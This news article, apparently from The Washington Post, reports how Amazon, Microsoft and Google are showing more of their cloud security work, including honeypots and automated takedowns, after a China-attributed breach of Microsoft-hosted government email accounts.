Microsoft in particular has come under fire in the aftermath of an espionage operation attributed to the Chinese government that gave hackers unfettered access to the email accounts of Commerce Secretary Gina Raimondo, State Department officials and others this summer.
There was nothing that Washington could have done to stop those breaches because the attackers had burrowed so thoroughly into Microsoft’s own corporate networks that they were able to steal the digital tools that the company used to create and verify customer accounts. With that and other techniques, the hackers posed as large customer organizations and then granted themselves access to the inboxes of those organizations’ employees.
The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency has tasked its review board for the most significant hacking cases with investigating the Microsoft cloud breach. More broadly, officials have been talking about a changed security model, one of shared responsibility, with more of the weight falling on those best equipped to handle it, including security providers and the cloud companies.
In response, and in an effort to distinguish themselves from competitors on security grounds, the big three cloud computing companies are letting more of their efforts show.
“These are very large providers, providing a pretty substantial chunk of the computing environment, and they should have an obligation to deliver on security,” said Scott Crawford, research director for security at S&P Global’s 451 Research. “It’s good to see when they are, and it’s also good to see when they are called to account.”
Amazon, which has historically said little about its operations, recently demonstrated some of its techniques for The Washington Post ahead of more public explanations.
It showed how Amazon Web Services can send takedown requests to the administrators of servers hosting active malicious programs in an hour without any human involvement, down from a full day with help from human experts, analysts and engineers.
Amazon’s approach includes turning tens of thousands of virtual servers into hacking lures as soon as customers rotate off them. Known in security as honey pots, the bait locations can be configured to look like they are hosting variations of programs known to be under attack at any given time, such as those that included log4j, an open-source component with a flaw that set off a race between hackers and defenders and helped inspire legislation.
“We have a net footprint larger than any other cloud provider,” Amazon Chief Security Officer Steve Schmidt said in an interview. “There have been several situations where we have produced the pivotal component in a CISA advisory.” (Amazon founder and former CEO Jeff Bezos owns The Washington Post. Interim CEO Patty Stonesifer sits on Amazon’s board.)
Amazon said it helped with the Volt Typhoon attacks on critical infrastructure that Microsoft discovered and attributed to China, as well as router compromises that were blamed on the elite Russian government hacking squad Sandworm.
Like other big players, Amazon also has given information to CISA’s two-year-old Joint Cyber Defense Collaborative, which has passed on warnings to state governments and others being targeted.
Each of the providers has different visibility, which is why the collaboration center and other information sharing is important.
Beyond its cloud offerings, Microsoft sees global use of on-site versions of its top-selling computer operating system and other software and technical information when those crash, which can reveal failed attacks.
Microsoft has for years used extensive machine learning and modeling to identify threats, although like Amazon, it charges extra for some of the enhanced protection that results from that.
Google knows the most about individual online accounts, including those used by impostors, and the physical location of hackers.
Google said it also automates takedown requests. In addition, “we proactively scan the internet for Cloud credentials customers have exposed by mistake and notify customers of leaked credentials that pose a risk to their organizations’ security,” spokesperson Melanie Lombardi said.
But Amazon is the biggest cloud provider, which means it can see more attacks as they happen.
“Amazon has unique visibility and a uniquely broad customer set, and we deeply appreciate both their efforts to use that to derive security benefits for customers and the broader community and to share that information proactively,” said Eric Goldstein, chief of the cybersecurity mission at CISA.
Still, the three big companies are going to be most effective at catching what is coming for their own customers, because all have a selection bias that comes from deploying honey pots on their own infrastructure, said Andrew Morris, chief executive of security firm GreyNoise Intelligence. His company, which tracks attacks against all manner of targets, announced this month that it would start giving away sensors for others to install in exchange for the data they collect.
“It’s absolutely a good thing that this series of techniques is effective,” Morris said of the larger companies. “The data is also going to be very incomplete.”